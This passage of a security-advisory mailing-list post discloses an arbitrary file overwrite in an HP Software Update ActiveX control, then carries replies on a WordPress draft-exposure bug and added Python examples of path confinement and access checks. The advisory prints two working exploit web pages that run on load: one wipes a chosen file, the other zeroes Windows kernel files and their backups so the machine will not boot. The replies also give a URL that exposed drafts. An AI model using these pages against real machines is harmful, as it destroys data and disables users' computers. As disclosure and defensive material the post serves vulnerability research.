- inducing the remote user to launch a WWW link after obtaining information about the location(s) and name(s) of arbitrary file(s) on the remote system. After the link is clicked, the file contents will be unrecoverably destroyed. This attack vector thus requires additional social engineering of the victim to acquire the exact name and location of the potential target files.
- inducing the remote user to launch a WWW link resulting in corruption of vital operating system files, leaving the system unusable. This attack vector DOESN'T require any additional social engineering of the victim, because the system files are always placed in predictable locations.
Technical details:
//////////////////
The vulnerable ActiveX control EngineRules.dll is a component of the HP Software Updates system designed by the vendor.
It has the assigned CLSID 7CB9D4F5-C492-42A4-93B1-3F7D6946470D and is by default included in the "Safe for Scripting" OLE components, which allows full scripting access to the control's methods from within the browser.
The default control installation path is
C:\Program Files\Hewlett-Packard\eSupportDiags\RulesEngine.dll
The control is used by the HP Software Updates software's HPWUCli.exe client application to enumerate, load and store information about available software patches. The HPWUCli.exe binary is located in the directory:
C:\Program Files\HP\HP Software Update\
The control may also be used by a remote WWW service, such as Hewlett-Packard online software update service.
The potentially insecure method is:
void SaveToFile(String dataFilePath);
This method is used to store the software-patch-specific data (version, remote location, vendor name, software description) in a binary file beginning with a 32-bit integer value containing the count of patches stored in the data file.
The problem lies in the lack of distinction between local and global data file areas in this control. Both the LoadDataFromFile() method and the SaveDataToFile() method have access to the entire file system, therefore any arbitrary user file can be accessed remotely by a remote entity using one of these methods.
SaveDataToFile() can be exploited to store the empty-by-initialization software patch data in an existing file, which will result in the loss of the previous file contents and reset the file to 4 zero bytes, describing a zero-size patch.
Given the specific location of the vulnerability (the vendor's software update system), simply disabling the vulnerable control by means of a vendor patch (as in the other HP software vulnerability case, HPInfo) would in this case compromise the machine's software update system and leave the user vulnerable to future security issues.
Therefore reimplementation of the update system and/or implementation of a local data area for the vulnerable control is strongly recommended.
Remote Kernel Wreckage Exploit
//////////////////////////////
Using this flaw one can construct an armed exploit, able for example to destroy remote system kernel files and make the remote machine UNBOOTABLE. The exploit uses the vulnerable SaveToFile() to overwrite the NT system kernel files with 4 zero bytes. The targets are the memory-mapped ntoskrnl.exe and ntkrnlpa.exe kernel files, which don't have a write lock set on them and may be opened for writing. Although the Windows NT system contains a protection against this kind of activity (system file overwrite), it can be fooled by simultaneously overwriting the kernel files in the system binary backup directory (\System32\DllCache\), the actual system kernel files (\System32\) and the Driver Backup directory (\Windows\Driver Cache\).
After execution it will store zero-initialized patch information using the SaveToFile() method sequentially to the ntoskrnl.exe, ntkrnlpa.exe, ntkrnlmp.exe and ntkrpamp.exe NT kernel files, first in the System32\DllCache\ directory, second in the \System32\ directory and finally in the Windows\Driver Cache\ directory. After the very next OS shutdown, the machine will not be bootable anymore.
The exploit code is attached at the end of this advisory. NOTE however that it is provided ONLY as Proof of Concept code and has been released ONLY to estimate the impact level of the issue.
Vulnerable Software:
////////////////////
HP Software Update client v3.0.8.4
RulesEngine.dll ActiveX CTL v1.0
Internet Explorer 6.0
Internet Explorer 7.0
Windows XP Home
Windows XP Pro
Windows 2000
Windows 2003
Windows Vista
Vulnerable Hardware
///////////////////
Every HP notebook machine containing the HP Software Updates application is vulnerable. It is possible that the list of vulnerable machine models disclosed by the vendor in confirmation of the previous issue concerning HP laptops (the "HP Info Center" case) will be similar in this case.
Exploits:
/////////
//////////////////////////////////////////
//Remote Arbitrary File Corruption Exploit
//////////////////////////////////////////
<html>
<head>
<script language="JavaScript">
var filePath="c:\\temp\\testfile.txt";
function spawn3()
{
o2obj.SaveToFile(filePath);
}
</script>
</head>
<body onload="spawn3()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>
////////////////////////////////
//Remote Kernel Wreckage Exploit
////////////////////////////////
//
//
// WARNING! THE REAL THING...
// DON'T TRY THIS AT HOME!
// THIS WILL DAMAGE YOUR
// HP COMPUTER SYSTEM!!!
//
//
////////////////////////////////
<html>
<head>
<script language="JavaScript">
function spawn3()
{
o2obj.EvaluateRules();
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlmp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrpamp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlmp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrpamp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\sp2.cab");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\driver.cab");
}
function meltdown()
{
spawn3();
spawn3();
spawn3();
}
</script>
</head>
<body onload="meltdown()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>
Related final word:
///////////////////
Spiderpig, spiderpig, does whatever the spiderpig does...
;-)
Links:
//////
Original advisory link:
www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt
Credits:
////////
Issue discovery and research: porkythepig
Contact: porkythepig@anspi.pl
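The advisory's recommended fix is a "local data area": a SaveToFile()-style method should only ever write inside one directory the application owns, whatever name the caller passes. The following is an added illustration of that confinement check in Python, not HP's code and not part of the advisory; the data directory, the ".dat" suffix and the function names are assumptions, and the sample names at the bottom are constructed to exercise the kinds of path the vulnerable method accepted.

```python
"""Confine a caller-supplied data-file name to one fixed data directory.

Added example of the 'local data area' approach the advisory recommends for a
SaveToFile()-style method.  Not HP's code: DATA_DIR, ALLOWED_SUFFIX and the
function names are assumptions made for the illustration.
"""
import ntpath

# Assumed data area for the illustration (constructed; not the real HP location).
DATA_DIR = r"C:\ProgramData\ExampleUpdater\data"
# Only the application's own data-file type may be written.
ALLOWED_SUFFIX = ".dat"
# Windows reserves these names: opening "NUL.dat" opens a device, not a file.
RESERVED_NAMES = ({"CON", "PRN", "AUX", "NUL"}
                  | {f"COM{i}" for i in range(1, 10)}
                  | {f"LPT{i}" for i in range(1, 10)})


def resolve_data_file(name, base=DATA_DIR):
    """Map a relative data-file name onto an absolute path inside `base`.

    Raises ValueError for anything that would leave the data area: absolute or
    drive-qualified paths, UNC paths, '..' traversal, alternate data streams,
    reserved device names and unexpected file types.
    """
    if not name or "\x00" in name:
        raise ValueError("empty name or embedded NUL")
    if ":" in name:
        # Covers drive letters (c:\...) and NTFS alternate data streams (x.dat:hidden).
        raise ValueError(f"drive letter or stream syntax rejected: {name!r}")
    if name.startswith(("\\", "/")):
        # Rooted (\foo) and UNC (\\server\share) names are not relative to the data area.
        raise ValueError(f"rooted or UNC path rejected: {name!r}")

    base_norm = ntpath.normpath(base)
    candidate = ntpath.normpath(ntpath.join(base_norm, name))
    # normpath has resolved every '..'; the result must still sit below the data
    # directory.  The comparison is case-insensitive, as NTFS is.
    if ntpath.commonpath([base_norm, candidate]).lower() != base_norm.lower():
        raise ValueError(f"path escapes the data area: {name!r}")

    leaf = ntpath.basename(candidate)
    if leaf.split(".")[0].upper() in RESERVED_NAMES:
        raise ValueError(f"reserved device name: {leaf!r}")
    if not leaf.lower().endswith(ALLOWED_SUFFIX) or leaf.lower() == ALLOWED_SUFFIX:
        raise ValueError(f"unexpected file type: {leaf!r}")
    return candidate


def classify(names):
    """Return {name: resolved absolute path, or None when the name is rejected}."""
    results = {}
    for n in names:
        try:
            results[n] = resolve_data_file(n)
        except ValueError:
            results[n] = None
    return results


# Constructed sample inputs: two legitimate data-file names, then the kinds of
# path a method with unrestricted file-system access would have written to.
SAMPLE_NAMES = [
    "patches.dat",
    "vendor\\catalog.dat",
    r"c:\WINDOWS\system32\ntoskrnl.exe",
    r"..\..\Windows\system32\ntoskrnl.exe",
    "../../Windows/Driver Cache/i386/driver.cab",
    r"\\server\share\x.dat",
    "nul.dat",
    "patches.dat:hidden",
]

if __name__ == "__main__":
    for name, resolved in classify(SAMPLE_NAMES).items():
        print(f"{name!r:48} -> {resolved or 'REJECTED'}")
```

Only the first two sample names resolve; every other one is refused before any file is opened. The order of the checks matters: the colon and leading-separator tests give precise error messages, but the commonpath comparison after normalisation is the check that actually enforces the boundary, so it stays even if the earlier ones are relaxed.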
Date: 19 Dec 2007 20:07:40 -0000
Message-ID: <20071219200740.14434.qmail@securityfocus.com>
From: otto@ottodestruct.com
To: bugtraq@securityfocus.com
Subject: Re: Wordpress - Broken Access Control
Nobody was attacking you. Calm down and try to be a bit more professional, please.
Although I am still unable to reproduce the problem on any sort of setup, a few other people have claimed to make it work as well. So a patch has been created and applied to eliminate the dependency on "wp-admin/". The patch will most likely be in the next version of WordPress.
The bug tracking and patch for this issue can be found here:
http://trac.wordpress.org/ticket/5487
Date: Thu, 20 Dec 2007 05:29:01 +0800
From: Abel Cheung <abelcheung@gmail.com>
To: bugtraq@securityfocus.com
Subject: Re: Wordpress - Broken Access Control
Message-ID: <20071219212901.GA5252@deaddog.org>
References: <20071216100729.31246.qmail@securityfocus.com>
In-Reply-To: <20071216100729.31246.qmail@securityfocus.com>
On 2007-12-16(Sun) 10:07:29 -0000, otto@ottodestruct.com wrote:
> The is_admin() function is not supposed to tell whether a user is an administrator or not, it tells whether the user is looking at one of the administration pages. As such, this function does exactly what it is supposed to do.
>
> As for the rest, there is no flaw. To view a draft, the user must authenticate and have the correct capability set. There is no way to view drafts without being logged in and having that capability set on the user's role level.
>
> This "vulnerability" is non-existent.
Here I confirm the validity of the vulnerability:
Machine: Windows 2000 SP4, Apache 2.2.4, MySQL 5.0.45
Wordpress version tested: 2.2.0, 2.2.3, 2.3.1
Every time the URL http://localhost/wordpress/index.php/wp-admin/ is used and the user is NOT logged in, draft posts are indeed shown in each WordPress version.
And according to the WordPress bug report, a patch was applied on the 19th to address the problem.
Abel
--
Abel Cheung (GPG Key: 0xC67186FF)
Key fingerprint: 671C C7AE EFB5 110C D6D1 41EE 4152 E1F1 C671 86FF
--------------------------------------------------------------------
* My blog - http://me.abelcheung.org/
* Opensource Application Knowledge Assoc. - http://oaka.org/
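The two replies above disagree about whether a flaw exists, but both describe the same mechanism: a check that keyed off "wp-admin/" appearing in the URL, which a request for index.php/wp-admin/ satisfies even though nothing under wp-admin/ ran. The following added Python model (not WordPress code and not from either poster) separates the two questions a web application must answer, "which script is executing?" and "may this user see drafts?", and shows why only the second one is an authorisation decision. The CGI-style URL splitting, the script paths and the "view_drafts" capability name are assumptions made for the illustration.

```python
"""Model of the 'wp-admin/ in the URL' pattern discussed in the thread.

Added example; not WordPress's implementation.  The script list, the
SCRIPT_NAME/PATH_INFO split and the capability name are assumptions.
"""


def cgi_split(path, scripts=("/wordpress/index.php",)):
    """Split a request path the way a web server does before dispatching PHP.

    The longest known script that prefixes the path becomes SCRIPT_NAME; the
    remainder is PATH_INFO, a purely client-controlled string.
    """
    for script in sorted(scripts, key=len, reverse=True):
        if path == script or path.startswith(script + "/"):
            return {"SCRIPT_NAME": script,
                    "PATH_INFO": path[len(script):],
                    "REQUEST_URI": path}
    return {"SCRIPT_NAME": path, "PATH_INFO": "", "REQUEST_URI": path}


def looks_like_admin_url(request_uri):
    """The fragile pattern: a substring test on the raw request URL.

    '/wordpress/index.php/wp-admin/' matches although wp-admin/ never executed.
    """
    return "wp-admin/" in request_uri


def executing_admin_script(environ):
    """'Is this an admin page?' answered from the script the server really ran.

    SCRIPT_NAME is set by the server from the file it dispatched; PATH_INFO is
    whatever the client appended, so it must not influence this answer.
    """
    return environ.get("SCRIPT_NAME", "").startswith("/wordpress/wp-admin/")


def may_view_drafts(user):
    """Authorisation proper: an authenticated user holding the capability.

    'view_drafts' is an assumed capability name for the illustration.
    """
    return user is not None and "view_drafts" in user.get("caps", ())


def drafts_visible(environ, user, use_fixed=True):
    """Return True when draft posts would be included in a post listing."""
    if use_fixed:
        # Page location is irrelevant: the user's capability decides.
        return may_view_drafts(user)
    # Flawed variant: 'on an admin page' is treated as 'allowed to see drafts',
    # and 'on an admin page' is itself derived from the client-supplied URL.
    return looks_like_admin_url(environ.get("REQUEST_URI", ""))


if __name__ == "__main__":
    # Constructed request: the URL from the reproduction above, anonymous user.
    env = cgi_split("/wordpress/index.php/wp-admin/")
    print("SCRIPT_NAME =", env["SCRIPT_NAME"], "| PATH_INFO =", env["PATH_INFO"])
    print("flawed check shows drafts to anonymous:", drafts_visible(env, None, use_fixed=False))
    print("fixed check shows drafts to anonymous: ", drafts_visible(env, None))
    print("fixed check, user with capability:     ",
          drafts_visible(env, {"caps": ("view_drafts",)}))
```

The server splits /wordpress/index.php/wp-admin/ into SCRIPT_NAME=/wordpress/index.php and PATH_INFO=/wp-admin/, so the substring test says "admin page" while no admin script ran; the flawed variant therefore lists drafts for an anonymous visitor, which is exactly the reproduction reported above. The fixed variant never consults the URL for that decision, which is also why otto's point stands that is_admin()-style page detection was never meant to be an authorisation check.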